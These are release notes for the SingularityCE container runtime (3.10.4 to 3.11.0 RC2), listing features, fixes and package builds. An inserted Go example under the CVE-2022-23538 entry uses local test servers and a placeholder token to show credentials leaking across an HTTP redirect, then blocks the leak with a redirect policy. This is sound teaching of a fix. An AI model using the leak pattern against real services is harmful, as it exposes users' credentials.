  • RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
  • RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.19.5

SingularityCE 3.11.0 Release Candidate 2

03 Feb 16:02
2b051fb

This is the second release candidate for the upcoming Singularity 3.11.0 release. Users are encouraged to test and report any issues, but should use the stable 3.10 release for production deployments.

3.11.0 Release Candidate 2 [2023-02-02]

Bug Fixes

  • Avoid UID / GID readonly var warnings with --env-file.
  • Ensure proot flow does not override --remote build.

3.11.0 Release Candidate 1 [2023-01-11]

Changed defaults / behaviours

  • Image driver plugins, implementing the RegisterImageDriver callback, are deprecated and will be removed in 4.0. Support for the example plugin, permitting Ubuntu unprivileged overlay functionality, has been replaced with direct support for kernel unprivileged overlay.
  • When the kernel supports unprivileged overlay mounts in a user namespace, the container will be constructed using an overlay instead of underlay layout.
  • crun will be used as the low-level OCI runtime, when available, rather than runc. If crun is not available, runc will be used.
  • sessiondir maxsize in singularity.conf now defaults to 64 MiB for new installations. This is an increase from 16 MiB in prior versions.
  • Instances are started in a cgroup, by default, when run as root or when unified cgroups v2 with systemd as manager is configured. This allows singularity instance stats to be supported by default when possible.

New features / functionalities

Image Building

  • Support for a custom hashbang in the %test section of a Singularity recipe (akin to the runscript and start sections).
  • Non-root users can now build from a definition file, on systems that do not support --fakeroot. This requires the statically built proot command (https://proot-me.github.io/) to be available on the user PATH. These builds:
    • Do not support arch / debootstrap / yum / zypper bootstraps. Use localimage, library, oras, or one of the docker/oci sources.
    • Do not support %pre and %setup sections.
    • Run the %post sections of a build in the container as an emulated root user.
    • Run the %test section of a build as the non-root user, like singularity test.
    • Are subject to any restrictions imposed in singularity.conf. Incur a performance penalty due to proot's ptrace based interception of syscalls.
    • May fail if the %post script requires privileged operations that proot cannot emulate.

Instances

  • Instances started by a non-root user can use --apply-cgroups to apply resource limits. Requires cgroups v2, and delegation configured via systemd.
  • A new instance stats command displays basic resource usage statistics for a specified instance, running within a cgroup.
  • Instance name is available inside an instance via the new SINGULARITY_INSTANCE environment variable.

Mounts & Overlays

  • --writable-tmpfs is now available when running unprivileged, or explicitly requesting a user namespace, on systems with a kernel that supports unprivileged overlay mounts in a user namespace.
  • The --no-mount flag now accepts the value bind-paths to disable mounting of all bind path entries in singularity.conf.
  • Persistent overlays (--overlay) from a directory are now available when running unprivileged, or explicitly requesting a user namespace, on systems with a kernel that supports unprivileged overlay mounts in a user namespace.
  • Add --sparse flag to overlay create command to allow generation of a sparse ext3 overlay image.

OCI / Docker Compatibility

  • Support for DOCKER_HOST parsing when using docker-daemon://
  • DOCKER_USERNAME and DOCKER_PASSWORD supported without SINGULARITY_ prefix.
  • A new --oci flag for run/exec/shell enables the experimental OCI runtime mode. This mode:
    • Runs OCI container images from an OCI bundle, using runc or crun.
    • Supports docker://, docker-archive:, docker-daemon:, oci:, oci-archive: image sources.
    • Does not support running Singularity SIF, SquashFS, or EXT3 images.
    • Provides an environment similar to Singularity's native runtime, running with --compat.
    • Supports the following options / flags. Other options are not yet supported:
      • --fakeroot for effective root in the container. Requires subuid/subgid mappings.
      • Bind mounts via --bind or --mount. No image mounts.
      • Additional namespaces requests with --net, --uts, --user.
      • Container environment variables via --env, --env-file, and SINGULARITYENV_ host env vars.
      • --rocm to bind ROCm GPU libraries and devices into the container.
      • --nv to bind Nvidia driver / basic CUDA libraries and devices into the container.
      • --apply-cgroups, and the --cpu*, --blkio*, --memory*, --pids-limit flags to apply resource limits.

Signing & Verification

  • The sign command now supports signing with non-PGP key material by specifying the path to a private key via the --key flag.
  • The verify command now supports verification with non-PGP key material by specifying the path to a public key via the --key flag.
  • The verify command now supports verification with X.509 certificates by specifying the path to a certificate via the --certificate flag. By default, the system root certificate pool is used as trust anchors unless overridden via the --certificate-roots flag. A pool of intermediate certificates that are not trust anchors, but can be used to form a certificate chain, can also be specified via the --certificate-intermediates flag.
  • Support for online verification checks of X.509 certificates using the OCSP protocol (introduced flag: verify --ocsp-verify).

Other

  • Add new Linux capabilities: CAP_PERFMON, CAP_BPF, CAP_CHECKPOINT_RESTORE.
  • A new --reproducible flag for ./mconfig will configure Singularity so that its binaries do not contain non-reproducible paths. This disables plugin functionality.

Bug Fixes

  • In --rocm mode, the whole of /dev/dri is now bound into the container when --contain is in use. This makes /dev/dri/render devices available, required for later ROCm versions.
  • Overlay is blocked on the panfs filesystem, allowing sandbox directories to be run from panfs without error.

Development / Testing

  • Significant reduction in the use of network image sources in the e2e tests.
  • Improved parallelization and use of image caches in the e2e tests.
  • The e2e-test makefile target now accepts an argument E2E_GROUPS to only run specified groups of end-to-end tests. E.g. make -C builddir e2e-test E2E_GROUPS=VERSION,HELP will run end-to-end tests in the VERSION and HELP groups only.
  • The e2e-test makefile target now accepts an argument E2E_TESTS, which is a regular expression specifying the names of (top-level) end-to-end tests that should be run. E.g. make -C builddir e2e-test E2E_TESTS=^semantic will only run end-to-end tests with a name that begins with semantic. These E2E_ variables offer an alternative to the -run flag, which may be easier to use given the structure of e2e tests.

Thanks / Reporting Bugs

Thanks to our contributors for code, feedback, and testing efforts!

As always, please report any bugs to: https://github.com/sylabs/singularity/issues/new

If you think that you've discovered a security vulnerability please report it to: security@sylabs.io

Have fun!

Downloads

Source Code

Please use the singularity-ce-3.11.0-rc.2.tar.gz download below to obtain and install SingularityCE 3.11.0-rc.2. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

  • Ubuntu 18.04 (bionic)
  • Ubuntu 20.04 (focal)
  • Ubuntu 22.04 (jammy)
  • RHEL/CentOS 7 (el7)
  • RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
  • RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.19.3

SingularityCE 3.10.5

17 Jan 14:53
25989db

SingularityCE 3.10.5 is a security release in the 3.10 series.

We encourage all users to upgrade. Please see the details and CVE/GHSA link below for more information about the vulnerability.

Security Related Fixes

  • CVE-2022-23538: The github.com/sylabs/scs-library-client dependency included in SingularityCE >=3.10.0, <3.10.5 may leak user credentials to a third-party service via HTTP redirect. This issue is limited to library:// access to specific Singularity Enterprise 1.x or third-party library configurations, which implement a concurrent multi-part download flow. Access to Singularity Enterprise 2.x, or Singularity Container Services (cloud.sylabs.io), does not trigger the vulnerable flow. See the linked advisory for full details.

Commit 7b841c5 updates the dependency, bringing in the fix.
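The class of issue described above, a client credential forwarded across an HTTP redirect to another service, can be demonstrated with Go's net/http. This is an added example, not the scs-library-client fix: it uses two constructed local test servers and a placeholder token, shows that Go's default redirect policy compares hostnames only (so a port-only difference still forwards the Authorization header), and pins authenticated requests to their original origin with a CheckRedirect policy.

```go
package main

import (
	"errors"
	"net/http"
	"net/http/httptest"
	"net/url"
)

// Constructed placeholder credential for the example; not a real token.
const demoToken = "Bearer demo-token-not-real"

// sameOrigin requires scheme, host AND port to match. Go's default redirect policy only
// compares hostnames, so a redirect to another port on the same host still gets the header.
func sameOrigin(a, b *url.URL) bool {
	return a.Scheme == b.Scheme && a.Host == b.Host
}

// checkAuthRedirect is an http.Client.CheckRedirect policy: a request that carried an
// Authorization header may only be redirected within the origin it was sent to.
func checkAuthRedirect(req *http.Request, via []*http.Request) error {
	first := via[0]
	if first.Header.Get("Authorization") != "" && !sameOrigin(first.URL, req.URL) {
		return errors.New("refusing to follow cross-origin redirect with credentials")
	}
	return nil
}

// Demo performs one authenticated download against a constructed "library" server that
// redirects to a constructed "third party" server, and returns the Authorization value
// the third party received when client c followed the redirect ("" if it never arrived).
func Demo(c *http.Client) string {
	var seen string
	third := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		seen = r.Header.Get("Authorization")
	}))
	defer third.Close()
	library := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		http.Redirect(w, r, third.URL+"/part/0", http.StatusFound)
	}))
	defer library.Close()
	req, _ := http.NewRequest(http.MethodGet, library.URL+"/v1/imagepart", nil)
	req.Header.Set("Authorization", demoToken)
	if resp, err := c.Do(req); err == nil {
		resp.Body.Close()
	}
	return seen
}
```

Demo(http.DefaultClient) returns the placeholder token (the header reached the other server), while Demo(&http.Client{CheckRedirect: checkAuthRedirect}) returns an empty string.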

Thanks / Reporting Bugs

Thanks to our contributors for code, feedback, and testing efforts!

As always, please report any bugs to: https://github.com/sylabs/singularity/issues/new

If you think that you've discovered a security vulnerability please report it to: security@sylabs.io

Have fun!

Downloads

Source Code

Please use the singularity-ce-3.10.5.tar.gz download below to obtain and install SingularityCE 3.10.5. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

  • Ubuntu 18.04 (bionic)
  • Ubuntu 20.04 (focal)
  • Ubuntu 22.04 (jammy)
  • RHEL/CentOS 7 (el7)
  • RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
  • RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.19.5

SingularityCE 3.11.0 Release Candidate 1

11 Jan 15:26
0da4e0c

This is the first release candidate for the upcoming Singularity 3.11.0 release. Users are encouraged to test and report any issues, but should use the stable 3.10 release for production deployments.

Changed defaults / behaviours

  • Image driver plugins, implementing the RegisterImageDriver callback, are deprecated and will be removed in 4.0. Support for the example plugin, permitting Ubuntu unprivileged overlay functionality, has been replaced with direct support for kernel unprivileged overlay.
  • When the kernel supports unprivileged overlay mounts in a user namespace, the container will be constructed using an overlay instead of underlay layout.
  • crun will be used as the low-level OCI runtime, when available, rather than runc. If crun is not available, runc will be used.
  • sessiondir maxsize in singularity.conf now defaults to 64 MiB for new installations. This is an increase from 16 MiB in prior versions.
  • Instances are started in a cgroup, by default, when run as root or when unified cgroups v2 with systemd as manager is configured. This allows singularity instance stats to be supported by default when possible.

New features / functionalities

Image Building

  • Support for a custom hashbang in the %test section of a Singularity recipe (akin to the runscript and start sections).
  • Non-root users can now build from a definition file, on systems that do not support --fakeroot. This requires the statically built proot command (https://proot-me.github.io/) to be available on the user PATH. These builds:
    • Do not support arch / debootstrap / yum / zypper bootstraps. Use localimage, library, oras, or one of the docker/oci sources.
    • Do not support %pre and %setup sections.
    • Run the %post sections of a build in the container as an emulated root user.
    • Run the %test section of a build as the non-root user, like singularity test.
    • Are subject to any restrictions imposed in singularity.conf. Incur a performance penalty due to proot's ptrace based interception of syscalls.
    • May fail if the %post script requires privileged operations that proot cannot emulate.

Instances

  • Instances started by a non-root user can use --apply-cgroups to apply resource limits. Requires cgroups v2, and delegation configured via systemd.
  • A new instance stats command displays basic resource usage statistics for a specified instance, running within a cgroup.
  • Instance name is available inside an instance via the new SINGULARITY_INSTANCE environment variable.

Mounts & Overlays

  • --writable-tmpfs is now available when running unprivileged, or explicitly requesting a user namespace, on systems with a kernel that supports unprivileged overlay mounts in a user namespace.
  • The --no-mount flag now accepts the value bind-paths to disable mounting of all bind path entries in singularity.conf.
  • Persistent overlays (--overlay) from a directory are now available when running unprivileged, or explicitly requesting a user namespace, on systems with a kernel that supports unprivileged overlay mounts in a user namespace.
  • Add --sparse flag to overlay create command to allow generation of a sparse ext3 overlay image.

OCI / Docker Compatibility

  • Support for DOCKER_HOST parsing when using docker-daemon://.
  • DOCKER_USERNAME and DOCKER_PASSWORD supported without SINGULARITY_ prefix.
  • A new --oci flag for run/exec/shell enables the experimental OCI runtime mode. This mode:
    • Runs OCI container images from an OCI bundle, using runc or crun.
    • Supports docker://, docker-archive:, docker-daemon:, oci:, oci-archive: image sources.
    • Does not support running Singularity SIF, SquashFS, or EXT3 images.
    • Provides an environment similar to Singularity's native runtime, running with --compat.
    • Supports the following options / flags. Other options are not yet supported:
      • --fakeroot for effective root in the container. Requires subuid/subgid mappings.
      • Bind mounts via --bind or --mount. No image mounts.
      • Additional namespace requests via --net, --uts, --user.
      • Container environment variables via --env, --env-file, and SINGULARITYENV_ host env vars.
      • --rocm to bind ROCm GPU libraries and devices into the container.
      • --nv to bind Nvidia driver / basic CUDA libraries and devices into the container.
      • --apply-cgroups, and the --cpu*, --blkio*, --memory*, --pids-limit flags to apply resource limits.

Signing & Verification

  • The sign command now supports signing with non-PGP key material by specifying the path to a private key via the --key flag.
  • The verify command now supports verification with non-PGP key material by specifying the path to a public key via the --key flag.
  • The verify command now supports verification with X.509 certificates by specifying the path to a certificate via the --certificate flag. By default, the system root certificate pool is used as trust anchors unless overridden via the --certificate-roots flag. A pool of intermediate certificates that are not trust anchors, but can be used to form a certificate chain, can also be specified via the --certificate-intermediates flag.
  • Support for online verification checks of X.509 certificates using the OCSP protocol (introduced flag: verify --ocsp-verify).

Other

  • Add new Linux capabilities: CAP_PERFMON, CAP_BPF, CAP_CHECKPOINT_RESTORE.
  • A new --reproducible flag for ./mconfig will configure Singularity so that its binaries do not contain non-reproducible paths. This disables plugin functionality.

Bug Fixes

  • In --rocm mode, the whole of /dev/dri is now bound into the container when --contain is in use. This makes /dev/dri/render devices available, required for later ROCm versions.
  • Overlay is blocked on the panfs filesystem, allowing sandbox directories to be run from panfs without error.

Development / Testing

  • Significant reduction in the use of network image sources in the e2e tests.
  • Improved parallelization and use of image caches in the e2e tests.
  • The e2e-test makefile target now accepts an argument E2E_GROUPS to only run specified groups of end-to-end tests. E.g. make -C builddir e2e-test E2E_GROUPS=VERSION,HELP will run end-to-end tests in the VERSION and HELP groups only.
  • The e2e-test makefile target now accepts an argument E2E_TESTS, which is a regular expression specifying the names of (top-level) end-to-end tests that should be run. E.g. make -C builddir e2e-test E2E_TESTS=^semantic will only run end-to-end tests with a name that begins with semantic. These E2E_ variables offer an alternative to the -run flag, which may be easier to use given the structure of e2e tests.

Thanks / Reporting Bugs

Thanks to our contributors for code, feedback, and testing efforts!

As always, please report any bugs to: https://github.com/sylabs/singularity/issues/new

If you think that you've discovered a security vulnerability please report it to: security@sylabs.io

Have fun!

Downloads

Source Code

Please use the singularity-ce-3.11.0-rc.1.tar.gz download below to obtain and install SingularityCE 3.11.0-rc.1. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

  • Ubuntu 18.04 (bionic)
  • Ubuntu 20.04 (focal)
  • Ubuntu 22.04 (jammy)
  • RHEL/CentOS 7 (el7)
  • RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
  • RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.19.3

SingularityCE 3.10.4

10 Nov 15:20
7f1569c

SingularityCE 3.10.4 is a bugfix release in the 3.10 series.

Bug Fixes

  • Ensure make dist doesn't include conmon binary or intermediate files.
  • Do not hang on pull from http(s) source that doesn't provide a content-length.
  • Avoid hang on fakeroot cleanup under high load seen on some distributions / kernels.

Thanks / Reporting Bugs

Thanks to our contributors for code, feedback, and testing efforts!

As always, please report any bugs to: https://github.com/sylabs/singularity/issues/new

If you think that you've discovered a security vulnerability please report it to: security@sylabs.io

Have fun!

Downloads

Source Code

Please use the singularity-ce-3.10.4.tar.gz download below to obtain and install SingularityCE 3.10.4. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

  • Ubuntu 18.04 (bionic)
  • Ubuntu 20.04 (focal)
  • Ubuntu 22.04 (jammy)
  • RHEL/CentOS 7 (el7)
  • RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
  • RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.19.3